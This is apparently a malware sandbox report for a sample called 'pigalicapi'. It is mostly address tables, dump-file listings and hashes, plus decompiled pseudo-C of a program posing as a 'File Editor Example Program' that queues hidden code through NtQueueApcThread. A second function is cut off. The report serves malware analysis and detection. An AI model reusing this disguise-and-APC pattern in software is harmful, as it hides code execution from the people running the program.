                                                                                                                                                                                                                                                                                                        0x004012bd
                                                                                                                                                                                                                                                                                                        0x004012c7
                                                                                                                                                                                                                                                                                                        0x004012d1
                                                                                                                                                                                                                                                                                                        0x004012d5
                                                                                                                                                                                                                                                                                                        0x004012d7
                                                                                                                                                                                                                                                                                                        0x004012f0
                                                                                                                                                                                                                                                                                                        0x004012f0
                                                                                                                                                                                                                                                                                                        0x004012f6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004012f8
                                                                                                                                                                                                                                                                                                        0x004012fa
                                                                                                                                                                                                                                                                                                        0x00401300
                                                                                                                                                                                                                                                                                                        0x004012ed
                                                                                                                                                                                                                                                                                                        0x004012ed
                                                                                                                                                                                                                                                                                                        0x004012f0
                                                                                                                                                                                                                                                                                                        0x004012f6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004012e0
                                                                                                                                                                                                                                                                                                        0x004012e2
                                                                                                                                                                                                                                                                                                        0x004012e6
                                                                                                                                                                                                                                                                                                        0x00401309
                                                                                                                                                                                                                                                                                                        0x00401309
                                                                                                                                                                                                                                                                                                        0x0040130c
                                                                                                                                                                                                                                                                                                        0x00401312
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401307
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401307
                                                                                                                                                                                                                                                                                                        0x004012e8
                                                                                                                                                                                                                                                                                                        0x004012e8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004012e8
                                                                                                                                                                                                                                                                                                        0x004012e6
                                                                                                                                                                                                                                                                                                        0x00401314
                                                                                                                                                                                                                                                                                                        0x00401314
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401314
                                                                                                                                                                                                                                                                                                        0x004012f0
                                                                                                                                                                                                                                                                                                        0x00401319
                                                                                                                                                                                                                                                                                                        0x00401319
                                                                                                                                                                                                                                                                                                        0x00401321
                                                                                                                                                                                                                                                                                                        0x00401330
                                                                                                                                                                                                                                                                                                        0x00401333
                                                                                                                                                                                                                                                                                                        0x00401333
                                                                                                                                                                                                                                                                                                        0x00401338
                                                                                                                                                                                                                                                                                                        0x0040133d
                                                                                                                                                                                                                                                                                                        0x00401342
                                                                                                                                                                                                                                                                                                        0x00401349
                                                                                                                                                                                                                                                                                                        0x0040134c
                                                                                                                                                                                                                                                                                                        0x0040134f
                                                                                                                                                                                                                                                                                                        0x00401356
                                                                                                                                                                                                                                                                                                        0x0040135c
                                                                                                                                                                                                                                                                                                        0x0040135f
                                                                                                                                                                                                                                                                                                        0x004014c4
                                                                                                                                                                                                                                                                                                        0x00401365
                                                                                                                                                                                                                                                                                                        0x00401365
                                                                                                                                                                                                                                                                                                        0x00401367
                                                                                                                                                                                                                                                                                                        0x00401370
                                                                                                                                                                                                                                                                                                        0x00401373
                                                                                                                                                                                                                                                                                                        0x0040137b
                                                                                                                                                                                                                                                                                                        0x0040137b
                                                                                                                                                                                                                                                                                                        0x0040137e
                                                                                                                                                                                                                                                                                                        0x00401381
                                                                                                                                                                                                                                                                                                        0x00401389
                                                                                                                                                                                                                                                                                                        0x0040138c
                                                                                                                                                                                                                                                                                                        0x0040138f
                                                                                                                                                                                                                                                                                                        0x00401392
                                                                                                                                                                                                                                                                                                        0x00401396
                                                                                                                                                                                                                                                                                                        0x00401399
                                                                                                                                                                                                                                                                                                        0x0040139d
                                                                                                                                                                                                                                                                                                        0x004013a2
                                                                                                                                                                                                                                                                                                        0x004013aa
                                                                                                                                                                                                                                                                                                        0x004013aa
                                                                                                                                                                                                                                                                                                        0x004013ad
                                                                                                                                                                                                                                                                                                        0x004013b0
                                                                                                                                                                                                                                                                                                        0x004013b7
                                                                                                                                                                                                                                                                                                        0x004013bd
                                                                                                                                                                                                                                                                                                        0x004013c7
                                                                                                                                                                                                                                                                                                        0x004013cd
                                                                                                                                                                                                                                                                                                        0x004013cf
                                                                                                                                                                                                                                                                                                        0x004013d4
                                                                                                                                                                                                                                                                                                        0x004013d8
                                                                                                                                                                                                                                                                                                        0x004013dd
                                                                                                                                                                                                                                                                                                        0x004013e1
                                                                                                                                                                                                                                                                                                        0x004013e6
                                                                                                                                                                                                                                                                                                        0x004013e9
                                                                                                                                                                                                                                                                                                        0x004013ee
                                                                                                                                                                                                                                                                                                        0x004013f6
                                                                                                                                                                                                                                                                                                        0x004013fb
                                                                                                                                                                                                                                                                                                        0x004014cb
                                                                                                                                                                                                                                                                                                        0x004014d0
                                                                                                                                                                                                                                                                                                        0x004014d5
                                                                                                                                                                                                                                                                                                        0x004014e3
                                                                                                                                                                                                                                                                                                        0x004014ed
                                                                                                                                                                                                                                                                                                        0x004014f2
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004014f2
                                                                                                                                                                                                                                                                                                        0x00401401
                                                                                                                                                                                                                                                                                                        0x00401409
                                                                                                                                                                                                                                                                                                        0x0040140b
                                                                                                                                                                                                                                                                                                        0x00401410
                                                                                                                                                                                                                                                                                                        0x00401410
                                                                                                                                                                                                                                                                                                        0x0040141c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040141c
                                                                                                                                                                                                                                                                                                        0x00401235
                                                                                                                                                                                                                                                                                                        0x0040123a
                                                                                                                                                                                                                                                                                                        0x0040123f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040123f

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: malloc$CompareExceptionExchangeFilterInfoInterlockedSleepStartupUnhandledmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 52093863-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 14d5eb7bf9b79b84294aa7e0ba2b3a6fb8049dbdddb5457babaf65cc5e7f2071
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8e4e66b0b0a685f907c53a036abd111b35ec28aa5b749cb82d3d57855afc03b1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14d5eb7bf9b79b84294aa7e0ba2b3a6fb8049dbdddb5457babaf65cc5e7f2071
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 259191B1A04301CFD720EF69DA8075A7BF4FB44304F81493ED984AB3A1D7B89845CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 22%
                                                                                                                                                                                                                                                                                                        			E00402075(struct HINSTANCE__* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v32;
                                                                                                                                                                                                                                                                                                        				struct HWND__** _v36;
                                                                                                                                                                                                                                                                                                        				struct HWND__** _v40;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v64;
                                                                                                                                                                                                                                                                                                        				char _v72;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v76;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v80;
                                                                                                                                                                                                                                                                                                        				struct _WNDCLASSEXA _v128;
                                                                                                                                                                                                                                                                                                        				char _v160;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v164;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v168;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v188;
                                                                                                                                                                                                                                                                                                        				char _v192;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v196;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v228;
                                                                                                                                                                                                                                                                                                        				struct HINSTANCE__* _v232;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v236;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v240;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v244;
                                                                                                                                                                                                                                                                                                        				CHAR* _v248;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v252;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v256;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v260;
                                                                                                                                                                                                                                                                                                        				CHAR* _v264;
                                                                                                                                                                                                                                                                                                        				CHAR* _v268;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v272;
                                                                                                                                                                                                                                                                                                        				struct HWND__** _v276;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v288;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v292;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _v296;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t92;
                                                                                                                                                                                                                                                                                                        				struct HICON__* _t102;
                                                                                                                                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _t109;
                                                                                                                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _t139;
                                                                                                                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t152;
                                                                                                                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                                                                                                                        				struct HWND__*** _t158;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t160;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t161;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t162;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t152 = _t151 - 0xec;
                                                                                                                                                                                                                                                                                                        				_v168 = E00418AA0;
                                                                                                                                                                                                                                                                                                        				_v164 = 0x41910c;
                                                                                                                                                                                                                                                                                                        				_t92 =  &_v160;
                                                                                                                                                                                                                                                                                                        				_t149 =  &_v28;
                                                                                                                                                                                                                                                                                                        				 *_t92 =  &_v28;
                                                                                                                                                                                                                                                                                                        				_t150 = E00402410;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t92 + 4)) = E00402410;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t92 + 8)) = _t152;
                                                                                                                                                                                                                                                                                                        				E0040E1A0( &_v28, E00402410,  &_v192);
                                                                                                                                                                                                                                                                                                        				_v128.cbSize = 0x30;
                                                                                                                                                                                                                                                                                                        				_v128.style = 0;
                                                                                                                                                                                                                                                                                                        				_v128.lpfnWndProc = E00401A9C;
                                                                                                                                                                                                                                                                                                        				_v128.cbClsExtra = 0;
                                                                                                                                                                                                                                                                                                        				_v128.cbWndExtra = 0;
                                                                                                                                                                                                                                                                                                        				_v128.hInstance = _a4;
                                                                                                                                                                                                                                                                                                        				_v248 = 0x7f00;
                                                                                                                                                                                                                                                                                                        				_v252 = 0;
                                                                                                                                                                                                                                                                                                        				_v188 = 1;
                                                                                                                                                                                                                                                                                                        				_v128.hIcon = LoadIconA(??, ??);
                                                                                                                                                                                                                                                                                                        				_v128.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                                                                                                                                                                                                                        				_v128.hbrBackground = 6;
                                                                                                                                                                                                                                                                                                        				_v128.lpszMenuName = "MAINMENU";
                                                                                                                                                                                                                                                                                                        				_v128.lpszClassName = "WindowClass";
                                                                                                                                                                                                                                                                                                        				_t102 = LoadIconA(_a4, 0x41f0eb); // executed
                                                                                                                                                                                                                                                                                                        				_v128.hIconSm = _t102;
                                                                                                                                                                                                                                                                                                        				_t105 = RegisterClassExA( &_v128);
                                                                                                                                                                                                                                                                                                        				_t156 = _t152 - 0xfffffffffffffff4;
                                                                                                                                                                                                                                                                                                        				if((_t105 & 0xffffff00 | _t105 == 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        					_v228 = 0;
                                                                                                                                                                                                                                                                                                        					_v232 = _a4;
                                                                                                                                                                                                                                                                                                        					_v236 = 0;
                                                                                                                                                                                                                                                                                                        					_v240 = 0;
                                                                                                                                                                                                                                                                                                        					_v244 = 0xf0;
                                                                                                                                                                                                                                                                                                        					_v248 = 0x140;
                                                                                                                                                                                                                                                                                                        					_v252 = 0x80000000;
                                                                                                                                                                                                                                                                                                        					_v256 = 0x80000000;
                                                                                                                                                                                                                                                                                                        					_v260 = 0xcf0000;
                                                                                                                                                                                                                                                                                                        					_v264 = "File Editor Example Program";
                                                                                                                                                                                                                                                                                                        					_v268 = "WindowClass";
                                                                                                                                                                                                                                                                                                        					_v272 = 0x200;
                                                                                                                                                                                                                                                                                                        					_v188 = 1;
                                                                                                                                                                                                                                                                                                        					_t109 = CreateWindowExA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                                                                        					_t157 = _t156 - 0x30;
                                                                                                                                                                                                                                                                                                        					_v32 = _t109;
                                                                                                                                                                                                                                                                                                        					if(_v32 != 0) {
                                                                                                                                                                                                                                                                                                        						_v268 = 0;
                                                                                                                                                                                                                                                                                                        						_v272 = _v32;
                                                                                                                                                                                                                                                                                                        						_v188 = 1;
                                                                                                                                                                                                                                                                                                        						_t112 = ShowWindow(??, ??); // executed
                                                                                                                                                                                                                                                                                                        						_t158 = _t157 - 8;
                                                                                                                                                                                                                                                                                                        						_v36 = 0x7c3;
                                                                                                                                                                                                                                                                                                        						_v40 = 0xe0f;
                                                                                                                                                                                                                                                                                                        						_v76 = 0;
                                                                                                                                                                                                                                                                                                        						_v80 = 0;
                                                                                                                                                                                                                                                                                                        						if((E00401E50(_t112) & 0xffffff00 | _t113 != 0x00000000) != 0) {
                                                                                                                                                                                                                                                                                                        							 *_t158 = 0xffffa883;
                                                                                                                                                                                                                                                                                                        							ExitProcess(??);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *0x41a004 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x41a008 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x41a00c = 0;
                                                                                                                                                                                                                                                                                                        						 *0x41a014 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x41a010 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x41a018 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x422038 = 0x17149d65;
                                                                                                                                                                                                                                                                                                        						_v276 =  &_v80;
                                                                                                                                                                                                                                                                                                        						 *_t158 = _v36;
                                                                                                                                                                                                                                                                                                        						_v188 = 1;
                                                                                                                                                                                                                                                                                                        						E00401EBB(_t149); // executed
                                                                                                                                                                                                                                                                                                        						_v276 =  &_v76;
                                                                                                                                                                                                                                                                                                        						 *_t158 = _v40; // executed
                                                                                                                                                                                                                                                                                                        						E00401EBB(_t149); // executed
                                                                                                                                                                                                                                                                                                        						_v272 = 0x18;
                                                                                                                                                                                                                                                                                                        						_v276 = 0;
                                                                                                                                                                                                                                                                                                        						 *_t158 = 0x422020;
                                                                                                                                                                                                                                                                                                        						memset(??, ??, ??);
                                                                                                                                                                                                                                                                                                        						 *0x422020 = 0;
                                                                                                                                                                                                                                                                                                        						 *0x422024 = 1;
                                                                                                                                                                                                                                                                                                        						 *0x422028 = _v76;
                                                                                                                                                                                                                                                                                                        						_v44 = _v80;
                                                                                                                                                                                                                                                                                                        						_v264 = 0;
                                                                                                                                                                                                                                                                                                        						_v268 = 0;
                                                                                                                                                                                                                                                                                                        						_v272 = 0x422020;
                                                                                                                                                                                                                                                                                                        						_v276 = _v44;
                                                                                                                                                                                                                                                                                                        						 *_t158 = 0xfffffffe; // executed
                                                                                                                                                                                                                                                                                                        						NtQueueApcThread(??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                                                                        						L00404F84();
                                                                                                                                                                                                                                                                                                        						UpdateWindow(_v32);
                                                                                                                                                                                                                                                                                                        						_t160 = _t158 - 0x10;
                                                                                                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                                                                                                        							_v288 = 0;
                                                                                                                                                                                                                                                                                                        							_v292 = 0;
                                                                                                                                                                                                                                                                                                        							_v296 = 0;
                                                                                                                                                                                                                                                                                                        							 *_t160 =  &_v72;
                                                                                                                                                                                                                                                                                                        							_v188 = 1;
                                                                                                                                                                                                                                                                                                        							_t131 = GetMessageA(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        							_t161 = _t160 - 0x10;
                                                                                                                                                                                                                                                                                                        							if((_t131 & 0xffffff00 | GetMessageA > 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t161 =  &_v72;
                                                                                                                                                                                                                                                                                                        							_v188 = 1;
                                                                                                                                                                                                                                                                                                        							TranslateMessage(??);
                                                                                                                                                                                                                                                                                                        							_t162 = _t161 - 4;
                                                                                                                                                                                                                                                                                                        							 *_t162 =  &_v72;
                                                                                                                                                                                                                                                                                                        							DispatchMessageA(??);
                                                                                                                                                                                                                                                                                                        							_t160 = _t162 - 4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t139 = _v64;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						MessageBoxA(0, "Window Creation Failed!", "Error!", 0x1030);
                                                                                                                                                                                                                                                                                                        						_t161 = _t157 - 0x10;
                                                                                                                                                                                                                                                                                                        						_t139 = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					MessageBoxA(0, "Window Registration Failed!", "Error!", 0x1030);
                                                                                                                                                                                                                                                                                                        					_t161 = _t156 - 0x10;
                                                                                                                                                                                                                                                                                                        					_t139 = 0;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v196 = _t139;
                                                                                                                                                                                                                                                                                                        				 *_t161 =  &_v192;
                                                                                                                                                                                                                                                                                                        				E0040E320(_t149, _t150);
                                                                                                                                                                                                                                                                                                        				return _v196;
                                                                                                                                                                                                                                                                                                        			}



















































                                                                                                                                                                                                                                                                                                        0x0040207b
                                                                                                                                                                                                                                                                                                        0x00402081
                                                                                                                                                                                                                                                                                                        0x0040208b
                                                                                                                                                                                                                                                                                                        0x00402095
                                                                                                                                                                                                                                                                                                        0x0040209b
                                                                                                                                                                                                                                                                                                        0x0040209e
                                                                                                                                                                                                                                                                                                        0x004020a0
                                                                                                                                                                                                                                                                                                        0x004020a5
                                                                                                                                                                                                                                                                                                        0x004020a8
                                                                                                                                                                                                                                                                                                        0x004020b4
                                                                                                                                                                                                                                                                                                        0x004020b9
                                                                                                                                                                                                                                                                                                        0x004020c0
                                                                                                                                                                                                                                                                                                        0x004020c7
                                                                                                                                                                                                                                                                                                        0x004020ce
                                                                                                                                                                                                                                                                                                        0x004020d5
                                                                                                                                                                                                                                                                                                        0x004020df
                                                                                                                                                                                                                                                                                                        0x004020e2
                                                                                                                                                                                                                                                                                                        0x004020ea
                                                                                                                                                                                                                                                                                                        0x004020f6
                                                                                                                                                                                                                                                                                                        0x00402105
                                                                                                                                                                                                                                                                                                        0x00402121
                                                                                                                                                                                                                                                                                                        0x00402124
                                                                                                                                                                                                                                                                                                        0x0040212b
                                                                                                                                                                                                                                                                                                        0x00402132
                                                                                                                                                                                                                                                                                                        0x0040214c
                                                                                                                                                                                                                                                                                                        0x00402151
                                                                                                                                                                                                                                                                                                        0x0040215f
                                                                                                                                                                                                                                                                                                        0x00402161
                                                                                                                                                                                                                                                                                                        0x0040216c
                                                                                                                                                                                                                                                                                                        0x004021a1
                                                                                                                                                                                                                                                                                                        0x004021ac
                                                                                                                                                                                                                                                                                                        0x004021b0
                                                                                                                                                                                                                                                                                                        0x004021b8
                                                                                                                                                                                                                                                                                                        0x004021c0
                                                                                                                                                                                                                                                                                                        0x004021c8
                                                                                                                                                                                                                                                                                                        0x004021d0
                                                                                                                                                                                                                                                                                                        0x004021d8
                                                                                                                                                                                                                                                                                                        0x004021e0
                                                                                                                                                                                                                                                                                                        0x004021e8
                                                                                                                                                                                                                                                                                                        0x004021f0
                                                                                                                                                                                                                                                                                                        0x004021f8
                                                                                                                                                                                                                                                                                                        0x00402204
                                                                                                                                                                                                                                                                                                        0x0040220e
                                                                                                                                                                                                                                                                                                        0x00402210
                                                                                                                                                                                                                                                                                                        0x00402213
                                                                                                                                                                                                                                                                                                        0x0040221a
                                                                                                                                                                                                                                                                                                        0x0040224f
                                                                                                                                                                                                                                                                                                        0x0040225a
                                                                                                                                                                                                                                                                                                        0x00402262
                                                                                                                                                                                                                                                                                                        0x0040226c
                                                                                                                                                                                                                                                                                                        0x0040226e
                                                                                                                                                                                                                                                                                                        0x00402271
                                                                                                                                                                                                                                                                                                        0x00402278
                                                                                                                                                                                                                                                                                                        0x0040227f
                                                                                                                                                                                                                                                                                                        0x00402286
                                                                                                                                                                                                                                                                                                        0x00402299
                                                                                                                                                                                                                                                                                                        0x0040229b
                                                                                                                                                                                                                                                                                                        0x004022a7
                                                                                                                                                                                                                                                                                                        0x004022a7
                                                                                                                                                                                                                                                                                                        0x004022a9
                                                                                                                                                                                                                                                                                                        0x004022b3
                                                                                                                                                                                                                                                                                                        0x004022bd
                                                                                                                                                                                                                                                                                                        0x004022c7
                                                                                                                                                                                                                                                                                                        0x004022d1
                                                                                                                                                                                                                                                                                                        0x004022db
                                                                                                                                                                                                                                                                                                        0x004022e5
                                                                                                                                                                                                                                                                                                        0x004022f2
                                                                                                                                                                                                                                                                                                        0x004022f9
                                                                                                                                                                                                                                                                                                        0x004022fc
                                                                                                                                                                                                                                                                                                        0x00402306
                                                                                                                                                                                                                                                                                                        0x0040230e
                                                                                                                                                                                                                                                                                                        0x00402315
                                                                                                                                                                                                                                                                                                        0x00402318
                                                                                                                                                                                                                                                                                                        0x0040231d
                                                                                                                                                                                                                                                                                                        0x00402325
                                                                                                                                                                                                                                                                                                        0x0040232d
                                                                                                                                                                                                                                                                                                        0x00402334
                                                                                                                                                                                                                                                                                                        0x00402339
                                                                                                                                                                                                                                                                                                        0x00402343
                                                                                                                                                                                                                                                                                                        0x00402350
                                                                                                                                                                                                                                                                                                        0x00402358
                                                                                                                                                                                                                                                                                                        0x0040235b
                                                                                                                                                                                                                                                                                                        0x00402363
                                                                                                                                                                                                                                                                                                        0x0040236b
                                                                                                                                                                                                                                                                                                        0x00402376
                                                                                                                                                                                                                                                                                                        0x0040237a
                                                                                                                                                                                                                                                                                                        0x00402381
                                                                                                                                                                                                                                                                                                        0x00402389
                                                                                                                                                                                                                                                                                                        0x00402399
                                                                                                                                                                                                                                                                                                        0x0040239b
                                                                                                                                                                                                                                                                                                        0x004023ca
                                                                                                                                                                                                                                                                                                        0x004023ca
                                                                                                                                                                                                                                                                                                        0x004023d2
                                                                                                                                                                                                                                                                                                        0x004023da
                                                                                                                                                                                                                                                                                                        0x004023e5
                                                                                                                                                                                                                                                                                                        0x004023ed
                                                                                                                                                                                                                                                                                                        0x004023f7
                                                                                                                                                                                                                                                                                                        0x004023f9
                                                                                                                                                                                                                                                                                                        0x00402403
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004023a3
                                                                                                                                                                                                                                                                                                        0x004023ab
                                                                                                                                                                                                                                                                                                        0x004023b5
                                                                                                                                                                                                                                                                                                        0x004023b7
                                                                                                                                                                                                                                                                                                        0x004023bd
                                                                                                                                                                                                                                                                                                        0x004023c5
                                                                                                                                                                                                                                                                                                        0x004023c7
                                                                                                                                                                                                                                                                                                        0x004023c7
                                                                                                                                                                                                                                                                                                        0x00402405
                                                                                                                                                                                                                                                                                                        0x0040221c
                                                                                                                                                                                                                                                                                                        0x00402240
                                                                                                                                                                                                                                                                                                        0x00402242
                                                                                                                                                                                                                                                                                                        0x00402245
                                                                                                                                                                                                                                                                                                        0x00402245
                                                                                                                                                                                                                                                                                                        0x0040216e
                                                                                                                                                                                                                                                                                                        0x00402192
                                                                                                                                                                                                                                                                                                        0x00402194
                                                                                                                                                                                                                                                                                                        0x00402197
                                                                                                                                                                                                                                                                                                        0x00402197
                                                                                                                                                                                                                                                                                                        0x00402408
                                                                                                                                                                                                                                                                                                        0x00402431
                                                                                                                                                                                                                                                                                                        0x00402434
                                                                                                                                                                                                                                                                                                        0x00402446

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateIconLoadWindow
                                                                                                                                                                                                                                                                                                        • String ID: 0$Error!$File Editor Example Program$MAINMENU$Window Creation Failed!$Window Registration Failed!$WindowClass
                                                                                                                                                                                                                                                                                                        • API String ID: 1237199932-3124372322
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b10b63b767507c6481a4855463711b29b80b9f011e458724250d7178add0260
                                                                                                                                                                                                                                                                                                        • Instruction ID: 37ceb777bd878a6ae4fc1e0f4903b58b5a3b227ee6cbc29fc1c83407536e847a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b10b63b767507c6481a4855463711b29b80b9f011e458724250d7178add0260
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBA1E6B09053059FDB10EF64D98878EBFF0EB44308F50852DE498AB391D7B99989CF96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                                                                                                                        			E024E8800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				long* _v20;
                                                                                                                                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                                                                                                                                        				long* _v32;
